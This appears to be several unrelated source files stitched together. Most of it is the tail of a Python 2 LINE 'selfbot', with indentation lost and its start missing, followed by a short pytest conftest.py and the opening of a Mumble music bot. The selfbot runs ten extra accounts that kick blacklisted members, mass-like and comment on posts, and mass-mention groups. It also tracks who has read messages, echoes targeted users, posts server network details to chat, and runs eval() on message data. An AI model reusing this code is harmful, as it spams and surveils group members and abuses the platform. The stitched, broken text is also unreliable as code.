data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithUrl(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Time","เวลา"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิต์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nเวลาขณะนี้ : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#========================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Pmcheck","เชคดำ","เช็คดำ"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Mcheckcontact","Cb"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == '1kill':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
ki1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
elif msg.text in ["in on"]:
if msg.from_ in admin:
if wait["pautoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["in off"]:
if msg.from_ in admin:
if wait["pautoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif "/ตัส" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[profilePicture]\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[homePicture]\n" + str(cu))
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[homePicture]\n" + str(cu))
#=============================================
elif msg.text in ["!Sp"]:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sTamii Server" % (elapsed_time))
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned Bos")
except:
pass
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["#Cinvite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact 😉")
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 2
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
cl.sendText(msg.to, "Done...")
elif msg.text in ["Mchecky"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user\nมีบัญชีดำของคุณอยู่กลุ่มนี้")
xname = ""
for mi_d in wait["blacklist"]:
xname = cl.getContact(mi_d).displayName + ""
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "พูด " in msg.text.lower():
query = msg.text.lower().replace("พูด ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["คิก1","K1"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิก2","K2"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text in ["คิก3","K3"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
elif msg.text in ["คิก4","K4"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki4.updateGroup(G)
elif msg.text in ["คิก5","K5"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif msg.text in ["คิก6","K6"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
elif msg.text in ["คิก7","K7"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
elif msg.text in ["คิก8","K8"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
elif msg.text in ["คิก9","K9"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
elif msg.text in ["คิก10","K10"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
elif '/w ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("/w ","")
wikipedia.set_lang("th")
pesan="Wikipedia : "
pesan+=wikipedia.page(wiki).title
pesan+="\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Text Terlalu Panjang Silahkan Click link di bawah ini\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/go " in msg.text:
tanggal = msg.text.replace("/go ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir : "+lahir+"\n\nUmur : "+usia+"\n\nUltah : "+ultah+"\n\nZodiak : "+zodiak)
elif "declined" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
if op.type == 25:
msg = op.message
if msg.text.lower() in ["pheytcg fgtagg all"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
if op.type == 26:
msg = op.message
if msg.text.lower() in ["1123"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["คท"]:
cl.sendText(msg.to,"😆เช็คจัง กลัวบอทหลุด ล่ะสิ😆")
elif msg.text in ["เทสบอท"]:
cl.sendText(msg.to,"SELF BOT\n[By.☬ARIFISTIFIK☬]")
elif msg.text in [".อยู่ไหม"]:
cl.sendText(msg.to,"อยู่...")
elif msg.text in ["/อยู่ไหม"]:
cl.sendText(msg.to,"เรื่องของกู...")
elif msg.text in ["/ออนไหม"]:
cl.sendText(msg.to,"ออน")
elif msg.text in ["/ปิดป้องกัน"]:
cl.sendText(msg.to,"ปิดป้องกัน")
elif "/ตั้งเวลา" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัตกรุณาพิมพ์ ➠ /อ่าน")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "โปรเเกรมเปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "/ปิดการอ่าน" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "/อ่าน" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "SELF BOT\n[By.☬ARIFISTIFIK☬] \n\nLurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "กรุณาตั้งเวลาการอ่านใหม่อีกครั้งโปรดพิมพ์ ➠ /ตั้งเวลา")
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to, "[อัตโนมัติ]: " + text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1", "STKVER": "100" }
cl.sendMessage(msg)
if op.type == 26:
msg = op.message
if msg.contentType == 16:
url = msg.contentMetadata['postEndUrl']
cl.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
ki1.like(url[25:58], url[66:], likeType=1001)
ki1.comment(url[25:58], url[66:], wait["comment1"])
ki2.like(url[25:58], url[66:], likeType=1001)
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.like(url[25:58], url[66:], likeType=1001)
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.like(url[25:58], url[66:], likeType=1001)
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.like(url[25:58], url[66:], likeType=1001)
ki5.comment(url[25:58], url[66:], wait["comment1"])
ki6.like(url[25:58], url[66:], likeType=1001)
ki6.comment(url[25:58], url[66:], wait["comment1"])
ki7.like(url[25:58], url[66:], likeType=1001)
ki7.comment(url[25:58], url[66:], wait["comment1"])
ki8.like(url[25:58], url[66:], likeType=1001)
ki8.comment(url[25:58], url[66:], wait["comment1"])
ki9.like(url[25:58], url[66:], likeType=1001)
ki9.comment(url[25:58], url[66:], wait["comment1"])
ki10.like(url[25:58], url[66:], likeType=1001)
ki10.comment(url[25:58], url[66:], wait["comment1"])
print ("AUTO LIKE SELFBOT")
print ("Auto Like By.☬ARIFISTIFIK☬")
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n เเล้วพบใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendImageWithUrl(op.param1,image)
msg.contentType = 7
msg.contentMetadata={
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'707'
}
cl.sendMessage(msg)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(op.param1,image)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n[🙋ยินดีตอนรับ][By. ☬ARIFISTIFIK☬]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
conftest.py
|
from .server import create_server
import pytest
from multiprocessing import Process
from threading import Thread
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = create_server()
process = Process(target=instance.serve_forever)
yield process.start()
process.terminate()
# from . import server
# import pytest
# # from multiprocessing import Process
# from threading import Thread
# @pytest.fixture(scope='module', autouse=True)
# def server_setup():
# instance = server.create_server()
# # process = Process(target=instance.serve_forever)
# process = Thread(target=instance.serve_forever)
# process.setDaemon(True)
# process.start()
|
mumbleBot.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
import time
import sys
import math
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os
import os.path
import pymumble_py3 as pymumble
import pymumble_py3.constants
import variables as var
import logging
import logging.handlers
import traceback
import struct
from packaging import version
import util
import command
import constants
from constants import tr_cli as tr
from database import SettingsDatabase, MusicDatabase, DatabaseMigration
import media.system
from media.item import ValidationFailedError, PreparationFailedError
from media.playlist import BasePlaylist
from media.cache import MusicCache
class MumbleBot:
version = 'git'
def __init__(self, args):
